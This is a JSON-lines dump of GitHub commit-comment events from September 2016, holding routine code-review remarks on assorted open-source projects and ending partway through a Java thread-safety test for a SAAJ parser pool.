{"id":"4626344602","type":"CommitCommentEvent","actor":{"login":"lrusak"},"repo":{"name":"irtimmer/moonlight-embedded"},"payload":{"comment":{"id":19196508,"position":null,"line":null,"path":null,"commit_id":"6fcc63ee9ea7660080de985ef07931418b6e2183","created_at":"2016-09-27T19:17:13Z","updated_at":"2016-09-27T19:17:13Z","body":"With this commit we now get this error\r\n\r\n```\r\nmoonlight-embedded-2.2.1/src/video/aml.c:95:31: error: invalid operands to binary | (have 'void *' and 'int')\r\n   codecParam.am_sysinfo.param |= SYNC_OUTSIDE;\r\n```"}},"created_at":"2016-09-27T19:17:13Z"}
{"id":"4626350707","type":"CommitCommentEvent","actor":{"login":"ddaka"},"repo":{"name":"ddaka/sensu"},"payload":{"comment":{"id":19196518,"position":null,"line":null,"path":null,"commit_id":"14df325fcbf8bb2b27946f7abb1586fb538f4f9e","created_at":"2016-09-27T19:18:22Z","updated_at":"2016-09-27T19:18:22Z","body":"added **output_change** event value, so i can filter based on the output hash change."}},"created_at":"2016-09-27T19:18:22Z"}
{"id":"4626355549","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"jamesbascle/OneOf"},"payload":{"comment":{"id":19196528,"position":null,"line":null,"path":null,"commit_id":"ddfaba62ca2210c47bee4411b354ccc52d015156","created_at":"2016-09-27T19:19:14Z","updated_at":"2016-09-27T19:19:14Z","body":"Could you create a PR please?  I suspect that'll be a quicker way for me to pull in your changes.\r\n\r\nps. Why did you add a result parameter to the OneOfMatcher ctor?  Where are you heading with that?"}},"created_at":"2016-09-27T19:19:14Z"}
{"id":"4626355567","type":"CommitCommentEvent","actor":{"login":"kamal"},"repo":{"name":"andycroll/andycroll.com"},"payload":{"comment":{"id":19196529,"position":null,"line":null,"path":null,"commit_id":"cbe539237c174c6163c36a7e9ac6c332d729c31a","created_at":"2016-09-27T19:19:14Z","updated_at":"2016-09-27T19:19:14Z","body":"oh my god"}},"created_at":"2016-09-27T19:19:14Z"}
{"id":"4626361408","type":"CommitCommentEvent","actor":{"login":"Skatox"},"repo":{"name":"Yakorox/Practica"},"payload":{"comment":{"id":19196551,"position":null,"line":null,"path":null,"commit_id":"fed870f1545b95fabfe26a6ebd14d4ea6c4e3a0a","created_at":"2016-09-27T19:20:21Z","updated_at":"2016-09-27T19:20:21Z","body":"Cambie su perfil para incluir su nombre real, de esta forma es mas facil saber quien es. "}},"created_at":"2016-09-27T19:20:21Z"}
{"id":"4626361666","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19196552,"position":3,"line":28,"path":"Karl/integrations/nodejs/test.js","commit_id":"145384ebe222d7c0679f977f98f078263188d5a1","created_at":"2016-09-27T19:20:24Z","updated_at":"2016-09-27T19:20:24Z","body":"You're talking about the product that went from 0.12.x to 5.x, man.\r\n\r\nSure, it's always up to date."}},"created_at":"2016-09-27T19:20:24Z"}
{"id":"4626365180","type":"CommitCommentEvent","actor":{"login":"deenyt"},"repo":{"name":"deenyt/More_prework_dkt"},"payload":{"comment":{"id":19196562,"position":null,"line":null,"path":null,"commit_id":"aae0ddf5eb6f047fcf654eb5f66c8fcaea3c44ee","created_at":"2016-09-27T19:21:05Z","updated_at":"2016-09-27T19:21:05Z","body":"trial of adding branches"}},"created_at":"2016-09-27T19:21:05Z"}
{"id":"4626366435","type":"CommitCommentEvent","actor":{"login":"ddbrown30"},"repo":{"name":"ClxS/FASTBuild-UE4"},"payload":{"comment":{"id":19196568,"position":null,"line":null,"path":null,"commit_id":"ef09422129a5ceefabb70e6956a4a9be0b4da524","created_at":"2016-09-27T19:21:18Z","updated_at":"2016-09-27T19:21:18Z","body":"Hi, I'm trying to get this going and I'm having some trouble. I've got everything integrated and running, but I've found that FASTBuild has actually made my compile time significantly slower (it's at 4.5 hours right now. I'm still waiting for the first compile to finish.).\r\n\r\nWould you be able and willing to give me a hand with it? If so, could you send an email to danbrown@backtablestudios.com and we'll chat there. Thanks. :)"}},"created_at":"2016-09-27T19:21:18Z"}
{"id":"4626367224","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19196572,"position":null,"line":null,"path":null,"commit_id":"73e65a6213ea81e77eed1e6cea518dd2a9162a47","created_at":"2016-09-27T19:21:26Z","updated_at":"2016-09-27T19:21:26Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/73e65a6213ea81e77eed1e6cea518dd2a9162a47/source/docs/assets/css/main.css)\n"}},"created_at":"2016-09-27T19:21:26Z"}
{"id":"4626368018","type":"CommitCommentEvent","actor":{"login":"piernov"},"repo":{"name":"piernov/BRAINF-CK_SI3"},"payload":{"comment":{"id":19196576,"position":8,"line":8,"path":"src/brainfuck/Main.java","commit_id":"a4070497dca49cbb77527b43fbf69aef4cbb2c66","created_at":"2016-09-27T19:21:36Z","updated_at":"2016-09-27T19:21:36Z","body":"Forgot to delete that stuff."}},"created_at":"2016-09-27T19:21:36Z"}
{"id":"4626368868","type":"CommitCommentEvent","actor":{"login":"racardoso"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":19196581,"position":null,"line":null,"path":null,"commit_id":"8e5e1ad0c368ba741e963f4a24bda53c070bc4f6","created_at":"2016-09-27T19:21:45Z","updated_at":"2016-09-27T19:21:45Z","body":"@gut Nice job. Thanks."}},"created_at":"2016-09-27T19:21:45Z"}
{"id":"4626369613","type":"CommitCommentEvent","actor":{"login":"jgsogo"},"repo":{"name":"dimi309/small3d"},"payload":{"comment":{"id":19196584,"position":null,"line":null,"path":null,"commit_id":"c89e759db8554e52f06ee5e9e10a370302403a0f","created_at":"2016-09-27T19:21:53Z","updated_at":"2016-09-27T19:21:53Z","body":"Using `CMAKE_SOURCE_DIR` you force the one building the samples to call `conan install` in the top level of the current CMake source tree,... I prefer not to build neither create any file inside the source tree; but I think I have lost this battle :smile: "}},"created_at":"2016-09-27T19:21:53Z"}
{"id":"4626371713","type":"CommitCommentEvent","actor":{"login":"piernov"},"repo":{"name":"piernov/BRAINF-CK_SI3"},"payload":{"comment":{"id":19196590,"position":11,"line":11,"path":"src/brainfuck/virtualmachine/Machine.java","commit_id":"a4070497dca49cbb77527b43fbf69aef4cbb2c66","created_at":"2016-09-27T19:22:17Z","updated_at":"2016-09-27T19:22:17Z","body":"Remember it should be () or (30000)."}},"created_at":"2016-09-27T19:22:17Z"}
{"id":"4626373582","type":"CommitCommentEvent","actor":{"login":"piernov"},"repo":{"name":"piernov/BRAINF-CK_SI3"},"payload":{"comment":{"id":19196595,"position":9,"line":9,"path":"src/brainfuck/instructions/Incr.java","commit_id":"a4070497dca49cbb77527b43fbf69aef4cbb2c66","created_at":"2016-09-27T19:22:37Z","updated_at":"2016-09-27T19:22:37Z","body":"Have to check the correct color name and use an existing class there."}},"created_at":"2016-09-27T19:22:37Z"}
{"id":"4626379410","type":"CommitCommentEvent","actor":{"login":"piernov"},"repo":{"name":"piernov/BRAINF-CK_SI3"},"payload":{"comment":{"id":19196609,"position":15,"line":15,"path":"src/brainfuck/instructions/Incr.java","commit_id":"a4070497dca49cbb77527b43fbf69aef4cbb2c66","created_at":"2016-09-27T19:23:44Z","updated_at":"2016-09-27T19:23:44Z","body":"byte is signed so this doesn't work."}},"created_at":"2016-09-27T19:23:44Z"}
{"id":"4626380003","type":"CommitCommentEvent","actor":{"login":"Asido"},"repo":{"name":"bertvansteen/EpubSharp"},"payload":{"comment":{"id":19196613,"position":5,"line":5,"path":"EpubSharp.Tests/EpubBookTests.cs","commit_id":"c0403bb1b814744c360856065d78e04d09465640","created_at":"2016-09-27T19:23:51Z","updated_at":"2016-09-27T19:23:51Z","body":"Hi. You might be interested to know that I ported the project to .net core. During the process I found and fixed a regression bug caused by cloudscribe.HtmlAgilityPack making it unable to read certain epubs."}},"created_at":"2016-09-27T19:23:51Z"}
{"id":"4626382536","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196617,"position":47,"line":36,"path":"xElement.h","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:24:17Z","updated_at":"2016-09-27T19:24:17Z","body":"```cpp\r\nxElement(xElement&&) = default;\r\nxElement(const xElement&) = default;\r\n```"}},"created_at":"2016-09-27T19:24:17Z"}
{"id":"4626383026","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19196619,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-27T19:24:22Z","updated_at":"2016-09-27T19:24:22Z","body":"[Your `bst` code contains an example of it](https://github.com/epkann/Data-Structures/blob/e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca/bst/bst.go#L37).\r\n\r\n`if !h.Value.Less(v) && !v.Less(h.Value)` is equivalent to \r\n`if !(h.Value.Less(v) || v.Less(h.Value))`.\r\n\r\nIn this case, I personally think the way you had it originally is easier to understand, but it's good to use DeMorgan's law to see if the alternative is more readable."}},"created_at":"2016-09-27T19:24:22Z"}
{"id":"4626384501","type":"CommitCommentEvent","actor":{"login":"heckflosse"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":19196626,"position":null,"line":null,"path":null,"commit_id":"18c0f7ad9189ef55bfcb5ee6e23111ffef731c8d","created_at":"2016-09-27T19:24:38Z","updated_at":"2016-09-27T19:24:38Z","body":":+1: "}},"created_at":"2016-09-27T19:24:38Z"}
{"id":"4626384950","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196627,"position":23,"line":18,"path":"xElement.h","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:24:43Z","updated_at":"2016-09-27T19:24:43Z","body":"Что это?"}},"created_at":"2016-09-27T19:24:43Z"}
{"id":"4626385660","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196630,"position":30,"line":30,"path":"lib/node_modules/@stdlib/utils/deep-get/README.md","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:24:51Z","updated_at":"2016-09-27T19:24:51Z","body":"Spacing."}},"created_at":"2016-09-27T19:24:51Z"}
{"id":"4626386874","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196632,"position":57,"line":57,"path":"lib/node_modules/@stdlib/utils/deep-get/README.md","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:25:05Z","updated_at":"2016-09-27T19:25:05Z","body":"Spacing."}},"created_at":"2016-09-27T19:25:05Z"}
{"id":"4626387574","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196635,"position":98,"line":80,"path":"xElement.h","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:25:13Z","updated_at":"2016-09-27T19:25:13Z","body":"для чего m_mask?"}},"created_at":"2016-09-27T19:25:13Z"}
{"id":"4626387854","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196636,"position":69,"line":69,"path":"lib/node_modules/@stdlib/utils/deep-get/README.md","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:25:16Z","updated_at":"2016-09-27T19:25:16Z","body":"Spacing."}},"created_at":"2016-09-27T19:25:16Z"}
{"id":"4626389272","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19196643,"position":null,"line":null,"path":null,"commit_id":"9680a7bbd8bc389c73f64fd8e30cd983652b4816","created_at":"2016-09-27T19:25:31Z","updated_at":"2016-09-27T19:25:31Z","body":"Initial commit."}},"created_at":"2016-09-27T19:25:31Z"}
{"id":"4626390461","type":"CommitCommentEvent","actor":{"login":"joebowbeer"},"repo":{"name":"libpd/pd-for-android"},"payload":{"comment":{"id":19196646,"position":null,"line":null,"path":null,"commit_id":"7d41d3cd846ce9ac5e7c9f99993a56773dc805dd","created_at":"2016-09-27T19:25:45Z","updated_at":"2016-09-27T19:25:45Z","body":"Why was this committed without a PR?\r\n\r\nIs gradle-3.1 compatible with android gradle plugin? I thought gradle-2.14.1 was best practice. Moving from gradle 2 to gradle 3 may not be smooth."}},"created_at":"2016-09-27T19:25:45Z"}
{"id":"4626390888","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196647,"position":20,"line":20,"path":"lib/node_modules/@stdlib/utils/deep-get/lib/deep_get.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:25:50Z","updated_at":"2016-09-27T19:25:50Z","body":"s/opts/options/ to match signature below."}},"created_at":"2016-09-27T19:25:50Z"}
{"id":"4626392295","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196653,"position":31,"line":31,"path":"lib/node_modules/@stdlib/utils/deep-get/lib/deep_get.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:26:06Z","updated_at":"2016-09-27T19:26:06Z","body":"Tabs to spaces."}},"created_at":"2016-09-27T19:26:06Z"}
{"id":"4626393139","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196658,"position":70,"line":58,"path":"xElement.h","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:26:15Z","updated_at":"2016-09-27T19:26:15Z","body":"возврат ссылки на член класса плохая идея"}},"created_at":"2016-09-27T19:26:15Z"}
{"id":"4626393753","type":"CommitCommentEvent","actor":{"login":"sergio-teruel"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":19196661,"position":5,"line":47,"path":"connector_prestashop/models/product.py","commit_id":"68f4ee14a77bbec94ca60b202c08497efa537033","created_at":"2016-09-27T19:26:23Z","updated_at":"2016-09-27T19:26:23Z","body":"Changes done"}},"created_at":"2016-09-27T19:26:23Z"}
{"id":"4626394211","type":"CommitCommentEvent","actor":{"login":"terrillmoore"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":19196663,"position":null,"line":null,"path":null,"commit_id":"40e96518686393932ae3ee73aa7c06ee9af993d6","created_at":"2016-09-27T19:26:28Z","updated_at":"2016-09-27T19:26:28Z","body":"Hi Frank,\n\n \n\nWe’re probably violently agreeing. (and sorry for abruptness, I’m typing while at a show & multitasking).\n\n \n\nThe original algorithm said:\n\n \n\nwhile (!joined) { choose a channel c; try to join on c }\n\n \n\nIf channel c is not in sb2, “try to join on c” will fail (because no TTN gateway is listening).  \n\n \n\nThis means that  we can predict in advance that “try to join on c” is guaranteed to fail.  I’m simply optimizing.\n\n \n\nThe next step in the optimization is:\n\n \n\nwhile (! joined)  { \n\nchoose a channel c; \n\nif (we can predict in advance that joining on c will fail)  { \n\ngo through all the motions but don’t actually send or receive \n\n} else { \n\ntry to join on c;\n\n} \n\n}\n\n \n\nThe next step in the optimization is:\n\n \n\nwhile (! joined)  { \n\nchoose a channel c; \n\nif (we can predict in advance that joining on c will fail) { \n\ndo nothing \n\n} else { \n\ntry to join on c;\n\n} \n\n}\n\n \n\nAnd collapsing that further, you get to the code I posted.\n\n \n\nSo my point is just a formal one. \n\n \n\nIf “choosing a channel” works at all when the listener is on sb2 only, it’s only because we are guaranteed that we will get a value for c that is in sb2.  Therefore using the same algorithm, but not trying to join when we know it won’t work, is no change.   There’s no new infinite loop (however, there is now an infinite loop that doesn’t involve RF).\n\n \n\nI completely understand your concern about the infinite loop. I thought that the risk was there even before my change; that my change doesn’t make matters worse.  \n\n \n\nHowever, I do see that because of the nature of my optimization, I don’t increment the “try counter” that causes a JOIN to eventually fail with “too many attempts” – that’s outside the inner loop. I thought that this is really a minor concern. \n\n \n\nThe solution would be to have an auxiliary count of active channels. (Count the number of set bits in 0..63.)  Generate a number in that range. Then scan the bit for the n’th set bit. Finding the i’th active channel is pretty easy as a search:\n\n \n\n              for (i = 0; i < 4; ++i) {\n\n                             uint16 mask = ctable[i/16];\n\n                             if (mask == 0)\n\n                                           continue;\n\n                             for (j = 0; j < 16; mask >>=1; --j)\n\n                                           if (mask & 1)\n\n                                                          return i*16 + j;\n\n              }\n\n              return -1;\n\n \n\nThis would be even faster if the outer loop were unwound. Probably can’t justify the RAM for a table given how rarely this is used. And for TTN sb7, in fact, we’d execute the outer loop exactly once, and the inner loop from 1 to 8 times.\n\n \n\nWould need to have an aux variable that is “count of enabled channels” that is incremented by 0->1 changes in the enable-channel function, and decremented by\n\n1->0 changes in disable-channel. In the past for this kind of thing I’ve also kept a “smallest enabled channel” that lets you skip the initial search. \n\n \n\n--Terry\n\n \n\nFrom: Frank Leon Rose [mailto:notifications@github.com] \nSent: Tuesday, September 27, 2016 12:20\nTo: things-nyc/arduino-lmic <arduino-lmic@noreply.github.com>\nCc: Terry Moore <tmm@mcci.com>; Mention <mention@noreply.github.com>\nSubject: Re: [things-nyc/arduino-lmic] Honor the channel mask while trying to join the network. (40e9651)\n\n \n\nIt sounds like you think I have a problem with the strategy of transmitting to only enabled channels. I do not.\n\nI'm talking only about the algorithm for selecting an enabled channel. Just that for-loop. (It's probably not even worth thinking about or optimizing, which is why you think I'm talking about something else, because you think I'd know better.)\n\nHere's my point. An idealized algorithm would create a Set of the enabled channels, sized N, and then pick a random number 0<=rnd<N to select an enabled channel. Boom boom done. But of course, creating that set is a bunch of setup that is not negligible.\n\nThe two algorithms we use now are\n\n1.     do { pick a number 0<=x<64 } while (!enabled(x))\nWhich has the problem that it could spend a lot of time throwing darts if there aren't many channels enabled. (just in the loop - well before transmitting). A lot of time becomes infinite when there are no channels enabled (which, yes, would be a library user error, but not friendly of us to just hang.) \n\n2.     pick a number 0<=x<64. while (!enabled(x)) { x = ++x % 64 }\nWhich has the problem that an enabled channel just above a set of disabled channels will be chosen much more frequently than a channel in the middle of a set of enabled channels.\n\nI'll stop talking now and just post code if I write any. Cheers.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/things-nyc/arduino-lmic/commit/40e96518686393932ae3ee73aa7c06ee9af993d6#commitcomment-19194407> , or mute the thread <https://github.com/notifications/unsubscribe-auth/ASb_74ZiMQY7Ih9E-15ObWW18SPVbzbIks5quVBEgaJpZM4KH0Ec> .\n\n"}},"created_at":"2016-09-27T19:26:28Z"}
{"id":"4626395229","type":"CommitCommentEvent","actor":{"login":"broox"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":19196666,"position":null,"line":null,"path":null,"commit_id":"3b49a6316ecfa4ed29a038b0385207ff9c8b60c8","created_at":"2016-09-27T19:26:38Z","updated_at":"2016-09-27T19:26:38Z","body":"my tests that were using `nextTick` started failing since updating to 1.0.27..."}},"created_at":"2016-09-27T19:26:38Z"}
{"id":"4626395763","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196671,"position":19,"line":19,"path":"lib/node_modules/@stdlib/utils/deep-get/lib/factory.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:26:45Z","updated_at":"2016-09-27T19:26:45Z","body":"s/opts/options/ to match signature below."}},"created_at":"2016-09-27T19:26:45Z"}
{"id":"4626396785","type":"CommitCommentEvent","actor":{"login":"joebowbeer"},"repo":{"name":"libpd/pd-for-android"},"payload":{"comment":{"id":19196676,"position":8,"line":6,"path":"gradle/wrapper/gradle-wrapper.properties","commit_id":"7d41d3cd846ce9ac5e7c9f99993a56773dc805dd","created_at":"2016-09-27T19:26:56Z","updated_at":"2016-09-27T19:26:56Z","body":"Recommend: gradle-2.14.1-bin\r\n\r\nThere's no need to download gradle sources for this project."}},"created_at":"2016-09-27T19:26:56Z"}
{"id":"4626396868","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196677,"position":25,"line":25,"path":"lib/node_modules/@stdlib/utils/deep-get/lib/factory.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:26:57Z","updated_at":"2016-09-27T19:26:57Z","body":"Tabs to spaces."}},"created_at":"2016-09-27T19:26:57Z"}
{"id":"4626399120","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-krl-stdlib"},"payload":{"comment":{"id":19196680,"position":null,"line":null,"path":null,"commit_id":"79b1820b84d14ed3b86c3926adf3073982120645","created_at":"2016-09-27T19:27:23Z","updated_at":"2016-09-27T19:27:23Z","body":"These operators are intended for internal use by the compiler.\r\n\r\nAs it stands, though, they could be used in the language"}},"created_at":"2016-09-27T19:27:23Z"}
{"id":"4626399146","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196681,"position":17,"line":17,"path":"lib/node_modules/@stdlib/utils/deep-get/lib/index.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:27:23Z","updated_at":"2016-09-27T19:27:23Z","body":"Tabs to spaces."}},"created_at":"2016-09-27T19:27:23Z"}
{"id":"4626399179","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19196682,"position":null,"line":null,"path":null,"commit_id":"99991a5ceb1330ae39b8ca3aaa3416e892285e26","created_at":"2016-09-27T19:27:23Z","updated_at":"2016-09-27T19:27:23Z","body":"Initial commit."}},"created_at":"2016-09-27T19:27:23Z"}
{"id":"4626399693","type":"CommitCommentEvent","actor":{"login":"tkirshboim"},"repo":{"name":"libpd/pd-for-android"},"payload":{"comment":{"id":19196683,"position":null,"line":null,"path":null,"commit_id":"7d41d3cd846ce9ac5e7c9f99993a56773dc805dd","created_at":"2016-09-27T19:27:29Z","updated_at":"2016-09-27T19:27:29Z","body":"Sorry about that, I'll lower it back to 2.14 and create a PR for the following changes."}},"created_at":"2016-09-27T19:27:29Z"}
{"id":"4626400413","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196684,"position":18,"line":18,"path":"lib/node_modules/@stdlib/utils/deep-get/lib/validate.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:27:38Z","updated_at":"2016-09-27T19:27:38Z","body":"`@example`"}},"created_at":"2016-09-27T19:27:38Z"}
{"id":"4626401945","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196693,"position":23,"line":23,"path":"lib/node_modules/@stdlib/utils/deep-get/lib/validate.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:27:55Z","updated_at":"2016-09-27T19:27:55Z","body":"Use `hasOwnProperty` utility."}},"created_at":"2016-09-27T19:27:55Z"}
{"id":"4626405836","type":"CommitCommentEvent","actor":{"login":"lboxell"},"repo":{"name":"gslab-econ/template"},"payload":{"comment":{"id":19196707,"position":null,"line":null,"path":null,"commit_id":"e881ff7e9d19f8b682d7cee50534bbc7ff89bfdb","created_at":"2016-09-27T19:28:38Z","updated_at":"2016-09-27T19:28:38Z","body":"My commit by accident."}},"created_at":"2016-09-27T19:28:38Z"}
{"id":"4626407057","type":"CommitCommentEvent","actor":{"login":"lboxell"},"repo":{"name":"gslab-econ/template"},"payload":{"comment":{"id":19196710,"position":null,"line":null,"path":null,"commit_id":"80e9c596410de892d3481e8f4bfbb7275a90b8bb","created_at":"2016-09-27T19:28:52Z","updated_at":"2016-09-27T19:28:52Z","body":"My commit by accident."}},"created_at":"2016-09-27T19:28:52Z"}
{"id":"4626407682","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196711,"position":12,"line":12,"path":"lib/node_modules/@stdlib/utils/deep-get/package.json","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:28:59Z","updated_at":"2016-09-27T19:28:59Z","body":"Why `stdmath`?"}},"created_at":"2016-09-27T19:28:59Z"}
{"id":"4626408887","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196715,"position":44,"line":44,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.dget.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:29:14Z","updated_at":"2016-09-27T19:29:14Z","body":"Test message."}},"created_at":"2016-09-27T19:29:14Z"}
{"id":"4626409264","type":"CommitCommentEvent","actor":{"login":"TheFakeMateo"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":19196716,"position":null,"line":null,"path":null,"commit_id":"9c246adf7aa8d765001d416d4d4b878000b1624d","created_at":"2016-09-27T19:29:19Z","updated_at":"2016-09-27T19:29:19Z","body":"Thanks for reminding me. I'll see what I can do. May have to move some stuff to another bank because I'm super low on space in the battle/core.asm bank."}},"created_at":"2016-09-27T19:29:19Z"}
{"id":"4626410040","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196720,"position":61,"line":52,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:29:28Z","updated_at":"2016-09-27T19:29:28Z","body":"тут std::move не нужен"}},"created_at":"2016-09-27T19:29:28Z"}
{"id":"4626410892","type":"CommitCommentEvent","actor":{"login":"Skatox"},"repo":{"name":"Programacion2UNET/practica-1-yimilan"},"payload":{"comment":{"id":19196722,"position":null,"line":null,"path":null,"commit_id":"49b96fb7c2f85566c90dcaca7ae846d7b41f8f4c","created_at":"2016-09-27T19:29:38Z","updated_at":"2016-09-27T19:29:38Z","body":"exceletne el uso de inglés en el código"}},"created_at":"2016-09-27T19:29:38Z"}
{"id":"4626412329","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"0tanya0/SoftwareTestingJava"},"payload":{"comment":{"id":19196725,"position":24,"line":24,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"cfdc1a9921d14c9253379b1258dead87a39fbe54","created_at":"2016-09-27T19:29:53Z","updated_at":"2016-09-27T19:29:53Z","body":"здесь клик не нужен"}},"created_at":"2016-09-27T19:29:53Z"}
{"id":"4626413244","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196728,"position":106,"line":106,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.dget.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:30:03Z","updated_at":"2016-09-27T19:30:03Z","body":"Test message."}},"created_at":"2016-09-27T19:30:03Z"}
{"id":"4626413296","type":"CommitCommentEvent","actor":{"login":"AcesHigh70"},"repo":{"name":"digipost/saaj"},"payload":{"comment":{"id":19196729,"position":null,"line":null,"path":null,"commit_id":"fe02d272512207008413a5d8167a710a727f93a1","created_at":"2016-09-27T19:30:04Z","updated_at":"2016-09-27T19:30:04Z","body":"Although this is a work around and prevents threads from hanging due to parsers being returned to the incorrect ParserPool, the underlying issue, I believe, is in the not thread safe ContextClassloaderLocal creating multiple ParserPools for the same ClassLoader.  I have created a ContextClassloaderLocalTest that exercises the get() and return() methods, initializes the ParserPool to a pool size of 5 and shows that multiple ParserPools are created and being continuously swapped in the cache that is used by all threads.  This means that threads are getting their SAXParser from one pool and returning it to another and thus permanently exhausting some pools and hanging those threads that are referencing the exhausted pools.\r\n\r\nIf you run the test below repeatedly until it doesn't run to completion and then take a thread dump, you will see the thread hanging on ParserPool.get(() which is caused by the exhausted pool.  To run the test you will need to place the ContextClassloaderLocal class in the com.saaj.test package.\r\n\r\n\r\n`package com.saaj.test;\r\n\r\nimport java.util.ArrayList;\r\nimport java.util.Collection;\r\nimport java.util.concurrent.Callable;\r\nimport java.util.concurrent.CountDownLatch;\r\nimport java.util.concurrent.ExecutionException;\r\nimport java.util.concurrent.ExecutorService;\r\nimport java.util.concurrent.Executors;\r\nimport java.util.concurrent.Future;\r\nimport java.util.concurrent.TimeUnit;\r\nimport javax.xml.parsers.SAXParser;\r\nimport org.junit.Assert;\r\nimport com.sun.xml.internal.messaging.saaj.util.ParserPool;\r\n\r\npublic class ContextClassloaderLocalTest {\r\n\r\n   private static ContextClassloaderLocal<ParserPool> parserPool = new ContextClassloaderLocal() {\r\n      protected ParserPool initialValue() throws Exception {\r\n         return new ParserPool(1);\r\n      }\r\n   };\r\n\r\n   public static void main(String[] args) throws InterruptedException {\r\n\r\n      ExecutorService service = Executors.newFixedThreadPool(80);\r\n\r\n      Collection<Callable<Boolean>> executors = new ArrayList<Callable<Boolean>>();\r\n\r\n      CountDownLatch latch = new CountDownLatch(80);\r\n\r\n      for (int i = 0; i < 80; i++) {\r\n         executors.add(new 